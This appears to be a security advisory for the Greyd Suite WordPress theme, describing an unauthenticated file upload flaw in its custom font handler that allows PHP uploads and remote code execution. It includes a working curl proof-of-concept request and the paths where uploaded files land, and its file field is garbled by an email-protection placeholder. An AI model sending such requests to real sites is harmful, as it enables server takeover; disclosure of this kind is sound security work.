The plugin does not properly validate uploaded custom font packages, and does not perform any authorization or csrf checks, allowing an unauthenticated attacker to upload arbitrary files including php source files, leading to possible remote code execution (RCE). Version 1.2.5 added CSRF checks
Send a POST requests against the wp-content/themes/greyd_suite/inc/customizer_ff.php file with some POST params and a ZIP file containing a CSS file and any other content:
curl --location --request POST 'https://theme-tests.docker.test/wp-content/themes/greyd_suite/inc/customizer_ff.php' \
--form 'mode="upload"' \
--form 'uploadpath="hackpath"' \
--form 'name_full="hackname"' \
--form '[email protected];type=application/zip'
This will extract the files into wp-content/themes/greyd_suite/inc/hackpath/hack/ without any checks of the files included in the ZIP file.
From version 1.2.5, the uploaded files will be found in wp-content/uploads/greyd_tp/custom_fonts/hack/